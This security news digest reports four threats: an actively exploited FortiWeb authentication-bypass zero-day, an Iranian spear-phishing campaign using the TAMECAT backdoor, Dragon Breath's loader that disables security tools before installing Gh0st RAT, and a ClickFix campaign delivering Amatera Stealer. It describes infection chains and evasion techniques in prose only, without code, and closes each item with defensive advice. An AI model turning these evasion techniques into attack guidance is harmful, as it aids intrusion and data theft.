FortiWeb Zero-Day (CVE-2025-64446) Actively Exploited to Create Admin Accounts and Execute Commands
Fortinet has confirmed that a critical FortiWeb zero-day vulnerability (CVE-2025-64446) was silently patched after widespread in-the-wild exploitation began in early October. The flaw, a relative path-traversal weakness in the FortiWeb GUI component, allows unauthenticated attackers to send crafted HTTP or HTTPS requests that bypass authentication and execute administrative operations on exposed devices. Multiple security researchers have validated the exploit, noting that earlier firmware builds remain vulnerable while updated versions no longer accept the attack chain. CISA has since added the vulnerability to its Known Exploited Vulnerabilities catalog and issued an emergency directive requiring federal agencies to patch by November 21. Researchers report that exploitation has targeted organizations across multiple industries, underscoring how security appliances remain high-value footholds for both cybercriminal and APT activity. Fortinet has released fixed firmware across all major branches, with the fully patched version being FortiWeb 8.0.2 and corresponding updates in the 7.6, 7.4, 7.2, and 7.0 series. Organizations unable to patch immediately are urged to disable HTTP/HTTPS access for all internet-exposed management interfaces, restrict administrative access to trusted networks, and monitor for unauthorized user creation or unexpected configuration changes. CISA further recommends isolating affected appliances, reviewing logs for anomalous traffic patterns, and enforcing strict segmentation for any security infrastructure reachable from external networks. The incident underscores a recurring trend: attackers are increasingly targeting edge devices and network security appliances, turning defensive technologies into entry points for deeper intrusions and lateral movement when they are not promptly updated.
Iranian SpearSpecter Campaign Targets High-Value Officials With Personalized Social Engineering and Advanced In-Memory Backdoors
Researchers have uncovered a long-running SpearSpecter espionage campaign targeting senior government, defense, and diplomatic officials across multiple regions using highly personalized social-engineering lures. Operated by Iran’s IRGC-IO–aligned threat cluster (APT42 / Mint Sandstorm / Educated Manticore / CharmingCypress), the group engages victims through multi-week rapport-building on WhatsApp before delivering tailored meeting invitations or conference documents. These lures redirect to attacker-controlled WebDAV shares, where malicious LNK files masquerade as PDFs and trigger hidden command execution. The infection chain ultimately deploys TAMECAT, an in-memory PowerShell backdoor with AES-encrypted multi-channel C2 over web traffic, Telegram, and Discord. Once active, the malware retrieves browser credentials, captures frequent screenshots, and exfiltrates staged data in encrypted chunks to evade inspection. The campaign’s sophistication lies in its blending of human-driven social trust with stealthy technical execution, enabling prolonged access to sensitive accounts and devices belonging to both officials and their family members. TAMECAT’s use of remote debugging, process suspension, and multi-stage loaders enables it to harvest high-value intelligence while bypassing endpoint controls. Persistence is achieved via registry-based login scripts, and infrastructure relies on Cloudflare Workers to obscure operator locations and maintain C2 resilience. The operation shows no signs of slowdown, demonstrating Iran’s continued prioritization of credential theft and long-term surveillance of high-value geopolitical targets. Defenders should restrict search-ms/WebDAV invocation, monitor for suspicious LNK execution paths, and deploy behavioral controls capable of identifying in-memory PowerShell backdoors and unauthorized remote debugging activity.
Dragon Breath Deploys RONINGLOADER to Disable Security Tools and Install Modified Gh0st RAT
Dragon Breath (APT-Q-27), a China-nexus threat actor linked to the broader Miuuti Group, is conducting a targeted campaign using a multi-stage loader known as RONINGLOADER to deliver a customized variant of Gh0st RAT. The operation relies on trojanized NSIS installers impersonating trusted applications, including Chrome and Teams, embedding redundant installer layers to hide malicious activity while installing benign decoys in parallel. Once activated, RONINGLOADER extracts encrypted shellcode from disguised image files, loads a clean system DLL to avoid existing userland hooks, and elevates privileges before scanning for and disabling Chinese-market security products, including Microsoft Defender, Kingsoft, Tencent PC Manager, and Qihoo 360. The loader employs multiple evasion techniques to terminate protected processes, tamper with Defender binaries, and neutralize host defenses. Its execution flow culminates in injecting a malicious DLL into regsvr32[.]exe, then launching Gh0st RAT inside high-privilege system processes to ensure stealth and persistence. The deployed Gh0st RAT variant supports a full suite of post-compromise capabilities, including registry modification, event log clearing, file exfiltration, command execution, clipboard and keystroke capture, and payload delivery via memory injection. In parallel, separate large-scale brand impersonation campaigns tracked as Campaign Trio and Campaign Chorus are delivering Gh0st RAT to Chinese-speaking users through trojanized installers for popular regional applications, with the latter campaign showing substantial sophistication through complex infection chains and redirection infrastructure. Researchers assess that Dragon Breath’s tooling reflects an ongoing shift toward layered loaders, signed-driver abuse, and aggressive EDR bypass to maintain access even in heavily instrumented environments. Organizations operating in East Asian markets should closely review execution of NSIS installers, monitor for unauthorized WDAC policy modifications and unusual driver loads, and enforce strict application-control policies to mitigate this evolving threat.
EVALUSION Campaign Uses ClickFix to Deliver Amatera Stealer and NetSupport RAT
Security analysts have identified a new EVALUSION malware campaign leveraging the ClickFix technique, in which victims are socially engineered to execute attacker-supplied commands via the Windows Run dialog. Once triggered, the chain downloads and launches Amatera Stealer, which is a rebranded and upgraded version of ACR Stealer, using obfuscated PowerShell loaders that employ XOR-based AMSI evasion and deliberately confusing code structures to bypass security tools. The infection begins with a .NET downloader protected via Agile[.]net packing, which fetches RC2-encrypted payloads from public file-hosting services before deploying a Pure Crypter–packed binary that disables AMSI in memory. Amatera’s capabilities include credential theft from browsers and password managers, exfiltration of cryptocurrency wallet data, and covert communications encrypted with AES-256-CBC using WoW64 syscall techniques to evade network inspection. Shortly after initial theft, attackers deploy NetSupport RAT to establish persistent remote access and full interactive control of compromised systems. The campaign blends carefully crafted social-engineering lures with multi-stage loaders and layered evasion mechanisms, allowing even well-protected endpoints to be compromised. Amatera’s use of syscall-level execution, encrypted C2, and dynamic payload loading enables attackers to target high-value systems while avoiding detection on low-value hosts selectively. The combination of data-stealing malware and remote-access tooling illustrates an increasingly common trend in modern attack chains, where interactive footholds for lateral movement or ransomware deployment quickly follow initial theft operations. Defenders should monitor for suspicious Run-dialog activity, block untrusted PowerShell execution, and deploy behavioral detection that can identify AMSI tampering, loader chains, and NetSupport RAT artifacts. This campaign highlights the need for layered security controls that can detect script-based loaders, fileless execution, and post-exploitation frameworks used in blended intrusions.
